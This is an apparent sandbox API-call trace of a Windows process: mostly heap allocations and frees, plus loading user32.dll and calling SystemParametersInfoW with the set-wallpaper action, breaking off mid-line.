[0241.430] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0241.430] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4b8 [0241.430] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0241.430] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721a8 [0241.430] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0241.430] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab698 [0241.430] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721d8 [0241.431] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0241.431] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0241.431] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab590 [0241.431] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0241.431] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0241.431] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4b8 | out: hHeap=0x2af0000) returned 1 [0241.431] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab650 [0241.431] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0241.431] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0241.431] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab668 [0241.431] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0241.431] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0241.431] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0241.431] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab698 [0241.431] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0241.431] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab470 [0241.431] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0241.431] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab488 [0241.431] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0241.431] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0241.431] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0241.431] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4a0 [0241.431] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0241.431] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0241.432] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0241.432] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab650 [0241.432] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0241.432] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0241.432] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4b8 [0241.432] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0241.432] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab848 [0241.432] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0241.432] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab920 [0241.432] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0241.432] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0241.432] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8d8 [0241.432] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0241.432] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab788 [0241.432] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0241.432] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0241.432] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c88 | out: hHeap=0x2af0000) returned 1 [0241.432] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab818 [0241.432] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0241.432] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0241.432] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab980 [0241.432] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0241.432] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab770 [0241.433] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0241.433] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab740 [0241.433] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0241.433] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0241.433] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72298 [0241.433] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8c0 [0241.433] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0241.433] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab998 [0241.433] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722a8 [0241.433] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a724f8 [0241.433] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab938 [0241.433] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab998 | out: hHeap=0x2af0000) returned 1 [0241.433] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0241.433] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab938 | out: hHeap=0x2af0000) returned 1 [0241.433] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a724f8 | out: hHeap=0x2af0000) returned 1 [0241.433] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9c8 [0241.433] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72548 [0241.433] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab890 [0241.433] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a724f8 [0241.433] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0241.433] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab938 [0241.433] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab890 | out: hHeap=0x2af0000) returned 1 [0241.433] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a724f8 | out: hHeap=0x2af0000) returned 1 [0241.433] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab938 | out: hHeap=0x2af0000) returned 1 [0241.433] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0241.434] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0241.434] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab890 [0241.434] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a724f8 [0241.434] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0241.434] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7a0 [0241.434] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab890 | out: hHeap=0x2af0000) returned 1 [0241.434] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a724f8 | out: hHeap=0x2af0000) returned 1 [0241.434] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7a0 | out: hHeap=0x2af0000) returned 1 [0241.434] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0241.434] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a724f8 [0241.434] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab890 [0241.434] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0241.434] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0241.434] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab938 [0241.434] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab890 | out: hHeap=0x2af0000) returned 1 [0241.434] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0241.434] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab938 | out: hHeap=0x2af0000) returned 1 [0241.434] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0241.434] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0241.434] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7a0 [0241.434] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0241.434] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72578 [0241.434] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab938 [0241.435] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7a0 | out: hHeap=0x2af0000) returned 1 [0241.435] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0241.435] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab938 | out: hHeap=0x2af0000) returned 1 [0241.435] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72578 | out: hHeap=0x2af0000) returned 1 [0241.435] LoadLibraryW (lpLibFileName="user32.dll") returned 0x76240000 [0241.435] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9e0 [0241.435] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0241.435] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0241.435] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x16) returned 0x29f6f60 [0241.435] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x29f6f60, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemParametersInfoW", lpUsedDefaultChar=0x0) returned 22 [0241.435] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9e0 | out: hHeap=0x2af0000) returned 1 [0241.435] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0241.435] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f60 | out: hHeap=0x2af0000) returned 1 [0241.436] GetProcAddress (hModule=0x76240000, lpProcName="SystemParametersInfoW") returned 0x7626f210 [0241.436] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d00 | out: hHeap=0x2af0000) returned 1 [0241.436] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0241.436] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab968 [0241.436] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0241.436] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72578 [0241.436] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0241.436] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0241.436] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0241.436] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72578 | out: hHeap=0x2af0000) returned 1 [0241.436] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0241.436] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0241.436] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab968 | out: hHeap=0x2af0000) returned 1 [0241.436] SystemParametersInfoW (in: uiAction=0x14, uiParam=0x0, pvParam=0x0, fWinIni=0x0 | out: pvParam=0x0) returned 1 [0241.534] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x3866180 [0241.534] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6ea0 [0241.534] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0241.534] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab890 [0241.534] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab938 [0241.534] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab950 [0241.534] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0241.534] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab950 | out: hHeap=0x2af0000) returned 1 [0241.534] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0241.535] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab938 | out: hHeap=0x2af0000) returned 1 [0241.535] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9e0 [0241.535] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab758 [0241.535] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab998 [0241.535] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0241.535] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab998 | out: hHeap=0x2af0000) returned 1 [0241.535] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0241.535] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab758 | out: hHeap=0x2af0000) returned 1 [0241.535] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab998 [0241.535] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab938 [0241.535] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7a0 [0241.535] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a726a8 [0241.535] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7a0 | out: hHeap=0x2af0000) returned 1 [0241.535] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0241.535] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab938 | out: hHeap=0x2af0000) returned 1 [0241.535] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9f8 [0241.535] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab938 [0241.535] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab950 [0241.535] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0241.535] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab950 | out: hHeap=0x2af0000) returned 1 [0241.535] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0241.535] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab938 | out: hHeap=0x2af0000) returned 1 [0241.535] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab758 [0241.536] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab968 [0241.536] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab938 [0241.536] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72778 [0241.536] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab938 | out: hHeap=0x2af0000) returned 1 [0241.536] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0241.536] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab968 | out: hHeap=0x2af0000) returned 1 [0241.536] FreeLibrary (hLibModule=0x76240000) returned 1 [0241.536] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72548 | out: hHeap=0x2af0000) returned 1 [0241.536] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0241.536] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a724f8 | out: hHeap=0x2af0000) returned 1 [0241.536] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0241.536] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9c8 | out: hHeap=0x2af0000) returned 1 [0241.536] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8c0 | out: hHeap=0x2af0000) returned 1 [0241.536] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0241.536] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab668 | out: hHeap=0x2af0000) returned 1 [0241.536] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0241.536] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0241.536] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0241.536] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0241.536] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0241.536] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0241.536] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0241.536] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0241.536] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab848 | out: hHeap=0x2af0000) returned 1 [0241.536] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4b8 | out: hHeap=0x2af0000) returned 1 [0241.536] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab920 | out: hHeap=0x2af0000) returned 1 [0241.537] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab788 | out: hHeap=0x2af0000) returned 1 [0241.537] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8d8 | out: hHeap=0x2af0000) returned 1 [0241.537] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab818 | out: hHeap=0x2af0000) returned 1 [0241.537] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab770 | out: hHeap=0x2af0000) returned 1 [0241.537] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab980 | out: hHeap=0x2af0000) returned 1 [0241.537] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab740 | out: hHeap=0x2af0000) returned 1 [0241.537] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0241.537] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0241.537] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0241.537] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0241.537] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0241.537] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x3866c48 [0241.537] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0241.537] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0241.537] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3866180 | out: hHeap=0x2af0000) returned 1 [0241.537] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0241.537] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0241.537] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0241.537] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0241.537] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0241.537] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0241.537] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0241.537] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab470 [0241.537] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0241.537] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab698 [0241.538] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0241.538] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0241.538] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0241.538] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0241.538] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0241.538] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0241.538] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de40 | out: hHeap=0x2af0000) returned 1 [0241.538] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4e8 | out: hHeap=0x2af0000) returned 1 [0241.538] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f58 | out: hHeap=0x2af0000) returned 1 [0241.538] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0241.538] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0241.538] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5c0 | out: hHeap=0x2af0000) returned 1 [0241.538] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b20 | out: hHeap=0x2af0000) returned 1 [0241.538] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0241.538] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e18 | out: hHeap=0x2af0000) returned 1 [0241.538] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab890 | out: hHeap=0x2af0000) returned 1 [0241.538] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9e0 | out: hHeap=0x2af0000) returned 1 [0241.538] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab998 | out: hHeap=0x2af0000) returned 1 [0241.538] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9f8 | out: hHeap=0x2af0000) returned 1 [0241.538] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab758 | out: hHeap=0x2af0000) returned 1 [0241.538] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ea0 | out: hHeap=0x2af0000) returned 1 [0241.538] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0241.538] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3866c48 | out: hHeap=0x2af0000) returned 1 [0241.539] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab590 | out: hHeap=0x2af0000) returned 1 [0241.539] HeapFree (in: 